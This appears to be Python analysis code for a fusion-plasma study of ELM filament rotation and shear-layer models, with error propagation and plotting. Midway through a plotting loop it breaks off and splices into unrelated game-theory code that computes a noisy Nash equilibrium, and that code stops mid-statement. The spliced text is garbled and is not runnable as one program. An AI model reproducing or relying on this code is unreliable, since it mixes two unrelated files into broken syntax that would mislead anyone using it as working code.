maximum $\\omega$')\n ax.set_xlabel(shear_results['data']['v_pol_prime_smooth']['label']+\" [\"+shear_results['data']['v_pol_prime_smooth']['unit']+\"]\")\n ax.set_ylabel(gpi_results['data']['Angular velocity ccf FLAP log']['label']+'$_{max}$ ['+gpi_results['data']['Angular velocity ccf FLAP log']['unit']+']')\n plt.tight_layout(pad=0.1)\n pdf_pages.savefig()\n pdf_pages.close()\n \n a=max_angular_velocity-max_angular_velocity.mean()\n b=max_vpol_shear-max_vpol_shear.mean()\n print('Correlation between vpol_max and omega_max:', np.sum(a*b)/np.sqrt((np.sum(a**2)*np.sum(b**2))))\n \ndef calculate_shear_induced_angular_velocity(elm_window=400e-6,\n elm_duration=100e-6,\n std_thres_multiplier=1.0,\n std_thres_outlier=3,\n \n filament_lifetime_threshold=5*2.5e-6, #Minimum time the filament needs to be considered to be a valid event\n sampling_time=2.5e-6, #Sampling time DAAA\n time_range_thres=[-50e-6,100e-6], #The filament's movement is analyzed in this time range\n shear_avg_t_elm_range=[-5e-3,-200e-6], #The time range where the shear layer results are averaged\n \n nocalc=True,\n return_results=False,\n \n plot=True,\n plot_error=False,\n plot_for_publication=False,\n plot_model_time_series=False,\n \n pdf=True,\n verbose=False,\n \n test_angular_velocity=False,\n test=False,\n plot_median_shear_layer=False,\n ):\n \"\"\"\n Calculation of the time dependent and independent shear induced filament\n rotation model for the ELM filament rotation study.\n \n Angular acceleration is generally deprecated, because it is a second order\n derivative utilizing a third order derivative which introduces increadibly\n large errors.\n \n Space (time) dependent angular velocity:\n omega(t) = (v_pol'+t*v_pol''*v_rad)/(1+(v_pol'*t)**2)\n \n Space independent angular velocity:\n omega(t) = v_pol'/(1+(v_pol'*t)**2)\n\n Parameters\n ----------\n elm_window : float\n DESCRIPTION. The default is 400e-6.\n elm_duration : float\n DESCRIPTION. The default is 100e-6.\n nocalc : boolean\n DESCRIPTION. The default is True.\n plot : boolean\n DESCRIPTION. The default is True.\n verbose : boolean\n DESCRIPTION. The default is False.\n\n Returns\n -------\n None. 
Plots the model and experimental angular velocity results.\n\n \"\"\"\n if pdf:\n pdf_pages=PdfPages(wd+'/plots/shear_max_vs_maximum_angular_velocity.pdf')\n if pdf and plot_model_time_series:\n pdf_time_series=PdfPages(wd+'/plots/model_vs_experimental_shear_time_series.pdf')\n \n if pdf and not plot:\n import matplotlib\n matplotlib.use('agg')\n \n gpi_results=read_gpi_results(elm_window=elm_window,\n elm_duration=elm_duration,\n correlation_threshold=0.7,\n transformation=None, #['log','power','exp','diff',]\n transformation_power=None,\n recalc_gpi=not nocalc,\n )\n\n shear_results=calculate_shear_layer_vpol(nocalc=nocalc,\n shear_avg_t_elm_range=shear_avg_t_elm_range,\n sg_filter_order=21,\n test=test)\n \n database_file='/Users/mlampert/work/NSTX_workspace/db/ELM_findings_mlampert_velocity_good.csv'\n db=pandas.read_csv(database_file, index_col=0)\n elm_index=list(db.index)\n \n if test_angular_velocity:\n pdf_pages_ang_vel_test=PdfPages(wd+'/plots/angular_acceleration_fitting_test.pdf')\n \n if pdf and plot:\n pdf_pages=PdfPages(wd+'/plots/shear_induced_rotation_model.pdf')\n \n if pdf and not plot:\n import matplotlib\n matplotlib.use('agg')\n \n coord_dict={'values':None,\n 'label':None,\n 'unit':None,\n 'index':None}\n \n data_dict={'data':[],\n 'error':[],\n 'derived':{},\n 'coord':{},\n 'label':'',\n 'unit':'',\n 'comment':'',\n }\n \n model_angular_velocity={'data':{},\n 'derived':{},\n 'coord':{},\n 'shot':[],\n 'elm_time':[],\n 'code':\"flap_nstx.analysis.calculate_shear_induced_angular_velocity\",\n }\n \n key='Angular velocity time dep model'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\omega_{model,t}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Angular velocity time indep model'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\omega_{model}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Shearing rate time dep avg'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$v^{,}_{pol,t,avg}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Shearing rate time indep avg'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$v\\'_{pol,avg}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Shearing rate time dep max neg'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$v\\'_{pol,t,min}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Shearing rate time dep max pos'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$v\\'_{pol,t,max}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Shearing rate time indep max'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$v\\'_{pol,max}$'\n model_angular_velocity['data'][key]['unit']='rad/s' \n \n key='Angular velocity experimental max neg'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\omega_{exp,min}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Angular velocity experimental max pos'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\omega_{exp,max}$'\n 
model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Angular velocity experimental max neg change t0'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\Delta_{t_{0}} \\omega_{exp,min}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Angular velocity experimental max pos change t0'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\Delta_{t_{0}} \\omega_{exp,max}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Angular velocity experimental avg'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\omega_{exp,avg}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Angular velocity experimental avg change t0'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\Delta_{t_{0}} \\omega_{exp,avg}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Form factor time dep max'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$f_{vpol,t,max}$'\n model_angular_velocity['data'][key]['unit']=''\n \n key='Form factor time dep avg'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$f_{vpol,t,avg}$'\n model_angular_velocity['data'][key]['unit']=''\n \n key='Form factor time indep max'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$f_{vpol,max}$'\n model_angular_velocity['data'][key]['unit']=''\n \n key='Form factor time indep avg'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$f_{vpol,avg}$'\n model_angular_velocity['data'][key]['unit']=''\n \n key='First term over second term'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\omega_{1}/\\omega_{2}$'\n model_angular_velocity['data'][key]['unit']=''\n \n key='Average time series exp'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\omega_{exp,median}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Average time series model'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\omega_{mod,median}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Full time series model'\n model_angular_velocity['data'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['data'][key]['label']='$\\omega_{mod,full}$'\n model_angular_velocity['data'][key]['unit']='rad/s'\n \n key='Filament time range'\n model_angular_velocity['derived'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['derived'][key]['label']='Time'\n model_angular_velocity['derived'][key]['unit']='s'\n \n key_derived='duration'\n model_angular_velocity['derived'][key]['derived'][key_derived]=copy.deepcopy(data_dict)\n model_angular_velocity['derived'][key]['derived'][key_derived]['label']='$\\Delta t$'\n model_angular_velocity['derived'][key]['derived'][key_derived]['unit']='s'\n \n key='Filament radial range'\n model_angular_velocity['derived'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['derived'][key]['label']='$\\Delta r t$'\n model_angular_velocity['derived'][key]['unit']='m'\n \n key='Filament total 
rotation angle'\n model_angular_velocity['derived'][key]=copy.deepcopy(data_dict)\n model_angular_velocity['derived'][key]['label']='$\\\\Delta \\\\theta t$'\n model_angular_velocity['derived'][key]['unit']='deg'\n \n key='t'\n model_angular_velocity['coord'][key]=copy.deepcopy(coord_dict)\n model_angular_velocity['coord'][key]['unit']='s'\n model_angular_velocity['coord'][key]['label']='Time'\n model_angular_velocity['coord'][key]['index']=1\n \n exclude_keys_from_nans=['Average time series exp',\n 'Average time series model',\n ]\n \n time_vec=gpi_results['coord']['time']['values']\n \n for index_elm in range(len(elm_index)):\n #preprocess velocity results, tackle with np.nan and outliers\n shot=int(db.loc[elm_index[index_elm]]['Shot'])\n #define ELM time for all the cases\n elm_time=db.loc[elm_index[index_elm]]['ELM time']/1000.\n model_angular_velocity['shot'].append(shot)\n model_angular_velocity['elm_time'].append(elm_time)\n flap.delete_data_object('*')\n if verbose: print('Calculating '+str(shot)+ ' at '+str(elm_time*1e3)+'ms')\n \n \"\"\"\n Filament lifetime calculation\n \"\"\"\n \n \n #Calculate the lifeline of the ELM filament\n #A threshold is calculated from the one standard deviation of the poloidal position\n position_gradient=np.diff(gpi_results['data']['Position max poloidal']['data'][index_elm,:]) \n ind_not_nan=np.logical_not(np.isnan(position_gradient))\n stddev=np.sqrt(np.var(position_gradient[ind_not_nan]))\n threshold=np.mean(np.abs(position_gradient[ind_not_nan]))+std_thres_multiplier*stddev\n ind=np.where(np.abs(position_gradient)>threshold)\n \n #Last index before and first index after the t_elm index in the middle, these two should be indicative of the filament's path\n ind1=np.asarray(ind)[(np.where(np.asarray(ind) < gpi_results['coord']['time']['values'].shape[0]//2))][-1]+1 \n ind2=np.asarray(ind)[(np.where(np.asarray(ind) > gpi_results['coord']['time']['values'].shape[0]//2))][0] \n #Limiting the filament lifetime to a thresholded range\n ind_thres=np.asarray(np.asarray(time_range_thres)/sampling_time+gpi_results['coord']['time']['values'].shape[0]//2,dtype=int)\n \n if ind1 < ind_thres[0]: ind1=ind_thres[0]\n if ind2 > ind_thres[1]: ind2=ind_thres[1]\n #Filament radial path\n filament_path_radial=gpi_results['data']['Position max radial']['data'][index_elm,ind1:ind2+1]\n #Filament lifetime range\n time_range=[gpi_results['coord']['time']['values'][ind1],\n gpi_results['coord']['time']['values'][ind2]]\n time_duration=time_range[1]-time_range[0]\n \n if time_duration > filament_lifetime_threshold:\n\n model_angular_velocity['derived']['Filament time range']['data'].append([time_range])\n model_angular_velocity['derived']['Filament time range']['error'].append(sampling_time)\n model_angular_velocity['derived']['Filament time range']['derived']['duration']['data'].append(time_duration)\n model_angular_velocity['derived']['Filament time range']['derived']['duration']['error'].append(2*sampling_time)\n model_angular_velocity['derived']['Filament radial range']['data'].append(np.asarray([min(filament_path_radial),\n max(filament_path_radial)]))\n \n \"\"\"\n TIME INDEPENDENT CALCULATION: omega(t) = v_pol'/(1+(v_pol'*t)**2)\n \"\"\"\n \n ind_not_nan_v_pol_prime = ~np.isnan(shear_results['data']['v_pol_prime_smooth']['data'][index_elm,:])\n ind_not_nan_v_pol_prime_prime = ~np.isnan(shear_results['data']['v_pol_prime_prime_smooth']['data'][index_elm,:])\n \n v_pol_prime=np.interp(gpi_results['data']['Position max radial']['data'][index_elm,ind1:ind2+1],\n 
shear_results['coord']['r']['values'][ind_not_nan_v_pol_prime],\n shear_results['data']['v_pol_prime_smooth']['data'][index_elm,:][ind_not_nan_v_pol_prime])\n v_pol_prime_error=np.interp(gpi_results['data']['Position max radial']['data'][index_elm,ind1:ind2+1],\n shear_results['coord']['r']['values'][ind_not_nan_v_pol_prime],\n shear_results['data']['v_pol_prime_smooth']['error'][index_elm,:][ind_not_nan_v_pol_prime])\n \n ind_not_nan = ~np.isnan(v_pol_prime)\n v_pol_prime = v_pol_prime[ind_not_nan]\n v_pol_prime_error=v_pol_prime_error[ind_not_nan]\n shear_avg=np.mean(v_pol_prime) #Avg shear rate in the range where the filament's path is\n # try:\n # maxind=np.argmax(np.abs(v_pol_prime)) #Avg shear rate in the range where the filament's path is\n # shear_avg=v_pol_prime[maxind]\n # except:\n # shear_avg=np.nan\n time_duration_error=sampling_time #Conservative estimate, one frame error \n shear_avg_error=np.sqrt(np.var(v_pol_prime))\n \n omega_model = shear_avg/(1+(shear_avg*time_duration)**2)\n omega_model_error=(np.abs((1+(shear_avg*time_duration)**2)+shear_avg*(1+2*shear_avg*time_duration**2)/(1+(shear_avg*time_duration)**2)**2)*shear_avg_error+\n np.abs(shear_avg/(1+(shear_avg*time_duration)**2)**2*2*time_duration*shear_avg**2)*time_duration_error)\n \n model_angular_velocity['data']['Angular velocity time indep model']['data'].append(omega_model)\n model_angular_velocity['data']['Angular velocity time indep model']['error'].append(omega_model_error)\n \n model_angular_velocity['data']['Shearing rate time indep avg']['data'].append(shear_avg)\n model_angular_velocity['data']['Shearing rate time indep avg']['error'].append(shear_avg_error)\n try:\n ind_max=np.argmax(np.abs(v_pol_prime))\n model_angular_velocity['data']['Shearing rate time indep max']['data'].append(v_pol_prime[ind_max])\n model_angular_velocity['data']['Shearing rate time indep max']['error'].append(v_pol_prime_error[ind_max])\n except:\n model_angular_velocity['data']['Shearing rate time indep max']['data'].append(np.nan)\n model_angular_velocity['data']['Shearing rate time indep max']['error'].append(np.nan)\n \n \n \"\"\"\n TIME (SPACE) DEPENDENT CALCULATION: \n Small angles: omega(t) = (v_pol'+t*v_pol''*v_rad)\n \n Large angles: omega(t) = (v_pol'+t*v_pol''*v_rad)/(1+(v_pol'*t)**2)\n \"\"\"\n \n nwin_path=len(filament_path_radial)\n omega_model=np.zeros(nwin_path)\n omega_model_error=np.zeros(nwin_path)\n \n shear_tdep_model=np.zeros(nwin_path)\n shear_tdep_model_error=np.zeros(nwin_path)\n \n shear_tdep_model_1st_term=np.zeros(nwin_path)\n shear_tdep_model_2nd_term=np.zeros(nwin_path)\n \n \n for ind_time in range(ind1,ind2+1):\n time_prop = (ind_time-ind1) * sampling_time\n time_prop_error=2.1e-6/2 # Should be asymmetric, corresponds to +- half the exposition rate\n \n v_rad=gpi_results['data']['Velocity ccf FLAP radial']['data'][index_elm,ind_time]\n v_rad_error=0.00375/2.5e-6 #Pixel size / sampling time\n \n #v_rad=np.gradient(gpi_results['data']['Position max radial']['data'][index_elm,:])[ind_time]/sampling_time\n #a_rad=np.gradient(np.gradient(gpi_results['data']['Position max radial']['data'][index_elm,:]))[ind_time]/sampling_time**2\n \n #Interpolating the shearing rate for the filament position\n v_pol_prime=np.interp(gpi_results['data']['Position max radial']['data'][index_elm,ind_time],\n shear_results['coord']['r']['values'][ind_not_nan_v_pol_prime],\n shear_results['data']['v_pol_prime_smooth']['data'][index_elm,:][ind_not_nan_v_pol_prime])\n \n v_pol_prime_error=np.interp(gpi_results['data']['Position 
max radial']['data'][index_elm,ind_time],\n shear_results['coord']['r']['values'][ind_not_nan_v_pol_prime],\n shear_results['data']['v_pol_prime_smooth']['error'][index_elm,:][ind_not_nan_v_pol_prime])\n \n #Interpolating the shearing rate for the filament position\n v_pol_prime_prime=np.interp(gpi_results['data']['Position max radial']['data'][index_elm,ind_time],\n shear_results['coord']['r']['values'][ind_not_nan_v_pol_prime_prime],\n shear_results['data']['v_pol_prime_prime_smooth']['data'][index_elm,:][ind_not_nan_v_pol_prime_prime])\n \n v_pol_prime_prime_error=np.interp(gpi_results['data']['Position max radial']['data'][index_elm,ind_time],\n shear_results['coord']['r']['values'][ind_not_nan_v_pol_prime_prime],\n shear_results['data']['v_pol_prime_prime_smooth']['error'][index_elm,:][ind_not_nan_v_pol_prime_prime])\n\n \n if test:\n print('v_pol_prime_delta_error',v_pol_prime_error/v_pol_prime)\n print('v_rad_delta_error',v_rad_error/v_rad)\n print('v_pol_prime_prime_delta_error',v_pol_prime_prime_error/v_pol_prime_prime)\n print('time_prop_delta_error',time_prop_error/time_prop)\n print('\\n')\n \n #Calculating the time dependent model\n f=(v_pol_prime + 0*time_prop*v_pol_prime_prime*v_rad)\n \n delta_f=(v_pol_prime_error+\n np.abs(v_pol_prime_prime*v_rad)*time_prop_error+\n np.abs(1+time_prop*v_rad)*v_pol_prime_prime_error+\n np.abs(time_prop*v_pol_prime_prime)*v_rad_error)\n \n g=(1+(v_pol_prime*time_prop)**2)\n delta_g=np.abs(2*v_pol_prime*time_prop**2)*v_pol_prime_error+np.abs(2*v_pol_prime**2*time_prop)*time_prop_error\n omega_model[ind_time-ind1]=f/g\n omega_model_error[ind_time-ind1]=np.abs(delta_f/g)+np.abs(f/g**2)*delta_g\n \n #The time dependent shear is dphi/dt=d(vpol't)/dt=v_pol_prime=t*v_pol_prime_prime*v_rad)\n shear_tdep_model[ind_time-ind1]=v_pol_prime\n shear_tdep_model_1st_term[ind_time-ind1]=v_pol_prime\n shear_tdep_model_2nd_term[ind_time-ind1]=time_prop*v_pol_prime_prime*v_rad\n \n shear_tdep_model_error[ind_time-ind1]=delta_f\n \n if test:\n print(omega_model_error/omega_model)\n \n \n #Should be checked whether the angular valocity should be integrated here\n #model_angular_velocity['data']['Angular velocity time dep model']['data'].append(np.sum(omega_model))\n ind_not_nan = ~np.isnan(omega_model)\n try:\n ind_max=np.argmin((omega_model[ind_not_nan]))\n model_angular_velocity['data']['Angular velocity time dep model']['data'].append(omega_model[ind_not_nan][ind_max])\n model_angular_velocity['data']['Angular velocity time dep model']['error'].append(omega_model_error[ind_not_nan][ind_max])\n except:\n model_angular_velocity['data']['Angular velocity time dep model']['data'].append(np.nan)\n model_angular_velocity['data']['Angular velocity time dep model']['error'].append(np.nan)\n \n #try:\n if True:\n first_average=np.mean(shear_tdep_model_1st_term[ind_not_nan])\n second_average=np.mean(shear_tdep_model_2nd_term[ind_not_nan])\n model_angular_velocity['data']['First term over second term']['data'].append(first_average/second_average)\n #except:\n # model_angular_velocity['data']['First term over second term']['data'].append(np.nan)\n try:\n ind_max=np.argmin((shear_tdep_model[ind_not_nan]))\n model_angular_velocity['data']['Shearing rate time dep max neg']['data'].append(shear_tdep_model[ind_not_nan][ind_max])\n model_angular_velocity['data']['Shearing rate time dep max neg']['error'].append(shear_tdep_model_error[ind_not_nan][ind_max])\n except:\n model_angular_velocity['data']['Shearing rate time dep max neg']['data'].append(np.nan)\n 
model_angular_velocity['data']['Shearing rate time dep max neg']['error'].append(np.nan)\n \n try:\n ind_max=np.argmax((shear_tdep_model[ind_not_nan]))\n model_angular_velocity['data']['Shearing rate time dep max pos']['data'].append(shear_tdep_model[ind_not_nan][ind_max])\n model_angular_velocity['data']['Shearing rate time dep max pos']['error'].append(shear_tdep_model_error[ind_not_nan][ind_max])\n except:\n model_angular_velocity['data']['Shearing rate time dep max pos']['data'].append(np.nan)\n model_angular_velocity['data']['Shearing rate time dep max pos']['error'].append(np.nan) \n \n if plot_model_time_series:\n time_vec=gpi_results['coord']['time']['values'][ind1:ind2+1]\n omega_exp=gpi_results['data']['Angular velocity ccf FLAP log']['data'][index_elm,ind1:ind2+1]\n fig,ax=plt.subplots(figsize=(8.5/2.54,8.5/2.54/np.sqrt(2)))\n \n ax.plot(time_vec*1e6,shear_tdep_model/1e3, label='$\\omega_{shear}$')\n ax.plot(time_vec*1e6,omega_model/1e3, label='$\\omega_{model}$')\n ax.plot(time_vec*1e6,omega_exp/1e3, label='$\\omega_{exp}$')\n \n ax.set_xlabel('$t-t_{ELM}$ [${\\mu s}$]')\n ax.set_ylabel('$\\omega [krad/s]$')\n ax.set_title('Angular velocities')\n ax.legend()\n plt.tight_layout(pad=0.1)\n pdf_time_series.savefig()\n ind_not_nan=np.where(np.logical_and(~np.isnan(omega_exp),~np.isnan(shear_tdep_model)))\n \n shear_tdep_model_full_time=np.zeros(len(gpi_results['coord']['time']['values']))\n shear_tdep_model_full_time[ind1:ind2+1]=shear_tdep_model\n model_angular_velocity['data']['Average time series model']['data'].append(list(shear_tdep_model_full_time))\n\n data_ang_vel=np.zeros(len(gpi_results['coord']['time']['values']))\n data_ang_vel[ind1:ind2+1]=gpi_results['data']['Angular velocity ccf FLAP log']['data'][index_elm,ind1:ind2+1]\n model_angular_velocity['data']['Average time series exp']['data'].append(list(data_ang_vel))\n \n try:\n model_angular_velocity['data']['Shearing rate time dep avg']['data'].append(np.mean(shear_tdep_model[ind_not_nan]))\n model_angular_velocity['data']['Shearing rate time dep avg']['error'].append(np.mean(shear_tdep_model_error[ind_not_nan])/np.sqrt(np.sum(ind_not_nan)))\n except:\n model_angular_velocity['data']['Shearing rate time dep avg']['data'].append(np.nan)\n model_angular_velocity['data']['Shearing rate time dep avg']['error'].append(np.nan)\n\n omega_exp=gpi_results['data']['Angular velocity ccf FLAP log']['data'][index_elm,ind1:ind2+1]\n ind_not_nan_omega_exp = ~np.isnan(omega_exp)\n \n try:\n ind_max=np.argmax(omega_exp[ind_not_nan_omega_exp])\n omega_max=omega_exp[ind_not_nan_omega_exp][ind_max]\n \n ind_min=np.argmin(omega_exp[ind_not_nan_omega_exp])\n omega_min=omega_exp[ind_not_nan_omega_exp][ind_min]\n \n omega_avg=np.mean(omega_exp[ind_not_nan_omega_exp])\n omega_t0 = np.mean(omega_exp[ind_not_nan_omega_exp][0:1])\n except:\n omega_max=np.nan\n omega_min=np.nan\n omega_avg=np.nan\n omega_t0=np.nan\n \n model_angular_velocity['data']['Angular velocity experimental max neg']['data'].append(omega_min)\n model_angular_velocity['data']['Angular velocity experimental max neg']['error'].append(np.pi/180.*sampling_time) \n \n model_angular_velocity['data']['Angular velocity experimental max pos']['data'].append(omega_max)\n model_angular_velocity['data']['Angular velocity experimental max pos']['error'].append(np.pi/180.*sampling_time)\n \n model_angular_velocity['data']['Angular velocity experimental max neg change t0']['data'].append(omega_min-omega_t0)\n model_angular_velocity['data']['Angular velocity experimental max neg change 
t0']['error'].append(np.pi/180./sampling_time)\n\n model_angular_velocity['data']['Angular velocity experimental max pos change t0']['data'].append(omega_max-omega_t0)\n model_angular_velocity['data']['Angular velocity experimental max pos change t0']['error'].append(np.pi/180./sampling_time)\n \n model_angular_velocity['data']['Angular velocity experimental avg']['data'].append(omega_avg)\n model_angular_velocity['data']['Angular velocity experimental avg']['error'].append(np.pi/180./sampling_time)\n \n model_angular_velocity['data']['Angular velocity experimental avg change t0']['data'].append(omega_avg-omega_t0)\n model_angular_velocity['data']['Angular velocity experimental avg change t0']['error'].append(np.pi/180./sampling_time)\n\n \n try:\n model_angular_velocity['derived']['Filament rotation angle']['data'].append(np.sum(omega_exp[ind_not_nan_omega_exp]*sampling_time))\n model_angular_velocity['derived']['Filament rotation angle']['error'].append(np.pi/180./sampling_time*np.sqrt(np.sum(ind_not_nan_omega_exp)))\n except:\n model_angular_velocity['derived']['Filament total rotation angle']['data'].append(np.nan)\n model_angular_velocity['derived']['Filament total rotation angle']['error'].append(np.nan)\n \n for key1 in ['dep','indep']:\n for key2 in ['avg','max']:\n try:\n form_factor=(model_angular_velocity['data']['Angular velocity experimental '+key2]['data'][-1]/\n model_angular_velocity['data']['Shearing rate time '+key1+' '+key2]['data'][-1])\n model_angular_velocity['data']['Form factor time '+key1+' '+key2]['data'].append(form_factor)\n \n form_factor_error_1=np.abs(form_factor*model_angular_velocity['data']['Angular velocity experimental '+key2]['error'][-1]/model_angular_velocity['data']['Angular velocity experimental '+key2]['data'][-1])\n form_factor_error_2=np.abs(form_factor*model_angular_velocity['data']['Shearing rate time '+key1+' '+key2]['error'][-1]/model_angular_velocity['data']['Shearing rate time '+key1+' '+key2]['data'][-1])\n model_angular_velocity['data']['Form factor time '+key1+' '+key2]['error'].append(form_factor_error_1+form_factor_error_2)\n except:\n model_angular_velocity['data']['Form factor time '+key1+' '+key2]['data'].append(np.nan)\n model_angular_velocity['data']['Form factor time '+key1+' '+key2]['error'].append(np.nan)\n\n else: #If the filament lifetime is too short (default:<12.5us (5frames))\n for key in model_angular_velocity['data'].keys():\n if key not in exclude_keys_from_nans:\n model_angular_velocity['data'][key]['data'].append(np.nan)\n model_angular_velocity['data'][key]['error'].append(np.nan)\n \n model_angular_velocity['derived']['Filament time range']['data'].append(np.nan)\n model_angular_velocity['derived']['Filament time range']['derived']['duration']['data'].append(np.nan)\n \n model_angular_velocity['derived']['Filament radial range']['data'].append([np.nan,np.nan])\n model_angular_velocity['derived']['Filament radial range']['error'].append([np.nan,np.nan])\n \n model_angular_velocity['derived']['Filament total rotation angle']['data'].append(np.nan)\n model_angular_velocity['derived']['Filament total rotation angle']['error'].append(np.nan) \n \n \n \n #Transforming everything to numpy arrays (numpy cannot append to the input array)\n for key in model_angular_velocity['data'].keys():\n model_angular_velocity['data'][key]['data']=np.asarray(model_angular_velocity['data'][key]['data'])\n model_angular_velocity['data'][key]['error']=np.asarray(model_angular_velocity['data'][key]['error'])\n \n 
model_angular_velocity['derived']['Filament time range']['data']=np.asarray(model_angular_velocity['derived']['Filament time range']['data'])\n model_angular_velocity['derived']['Filament time range']['derived']['duration']['data']=np.asarray(model_angular_velocity['derived']['Filament time range']['derived']['duration']['data'])\n model_angular_velocity['derived']['Filament time range']['derived']['duration']['error']=np.asarray(model_angular_velocity['derived']['Filament time range']['derived']['duration']['error']) \n \n \n if return_results:\n return model_angular_velocity\n \n if pdf or plot:\n\n plot_x_vs_y=[['Angular velocity experimental max','Form factor time indep max'],\n ['Angular velocity experimental max','Form factor time dep max'],\n ['Angular velocity experimental avg','Form factor time indep avg'],\n ['Angular velocity experimental avg','Form factor time dep avg'],\n # ['Angular velocity experimental','Angular velocity time indep model'],\n # ['Angular velocity experimental','Angular velocity time dep model'],\n \n ['Angular velocity experimental max change t0','Form factor time indep avg'],\n ['Angular velocity experimental max change t0','Form factor time dep avg'],\n \n ['Angular velocity experimental avg change t0','Form factor time indep avg'],\n ['Angular velocity experimental avg change t0','Form factor time dep avg'],\n ]\n \n if plot_for_publication:\n plot_x_vs_y=[['Angular velocity experimental avg change t0','Shearing rate time dep avg'],\n ['Angular velocity experimental avg change t0','Angular velocity time dep model'],\n \n ['Angular velocity experimental max neg change t0','Shearing rate time dep max neg'],\n ['Angular velocity experimental max pos change t0','Shearing rate time dep max pos'],\n ]\n \n for ind_plot in range(len(plot_x_vs_y)):\n fig,ax=plt.subplots(figsize=(8.5/2.54,8.5/2.54/np.sqrt(2)))\n xdata=model_angular_velocity['data'][plot_x_vs_y[ind_plot][0]]['data']/1e3\n ydata=model_angular_velocity['data'][plot_x_vs_y[ind_plot][1]]['data']/1e3\n \n x_err=model_angular_velocity['data'][plot_x_vs_y[ind_plot][0]]['error']/1e3\n y_err=model_angular_velocity['data'][plot_x_vs_y[ind_plot][1]]['error']/1e3\n ind_not_nan=np.logical_and(~np.isnan(xdata),\n ~np.isnan(ydata))\n \n xdata=xdata[ind_not_nan]\n x_err=x_err[ind_not_nan]\n \n ydata=ydata[ind_not_nan]\n y_err=y_err[ind_not_nan]\n \n xdata_std=np.sqrt(np.var(xdata))\n ydata_std=np.sqrt(np.var(ydata))\n \n ind_keep=np.where(np.logical_and(np.abs(xdata-np.mean(xdata))= 0.01)\n bad_off = np.where(last_off < 0.01)\n\n last_off[bad_off] = 0\n last_off[good_off] = last_off[good_off]/np.sum(last_off[good_off])\n\n good_def = np.where(last_def >= 0.01)\n bad_def = np.where(last_def < 0.01)\n\n last_def[bad_def] = 0\n last_def[good_def] = last_def[good_def]/np.sum(last_def[good_def])\n\n # for i,p in enumerate(last_off):\n # if(p > 0.05):\n # summ_off += p\n # thing_off[mdf.index[i]] = p\n # for i,p in enumerate(last_def):\n # if(p > 0.05):\n # summ_def += p\n # thing_def[colnames[i]] = p\n # return thing_def,thing_off\n\n # for i,p in enumerate(last_off):\n # thing_off[mdf.index[i]] = p\n # for i,p in enumerate(last_def):\n # thing_def[colnames[i]] = p\n\n # # return thing_def,thing_off\n\n return last_def, last_off\n\n#print(get_noisy_nash(mdf))\n\ndeff,offf = get_noisy_nash(mdf)\n# deff2,offf2 = get_noisy_nash(m2df)\n\ndef sample_strategy(mixed):\n opts = np.arange(len(mixed))\n return np.random.choice(opts, p = mixed)\n\n\n\np = sample_strategy(deff)\np2 = 
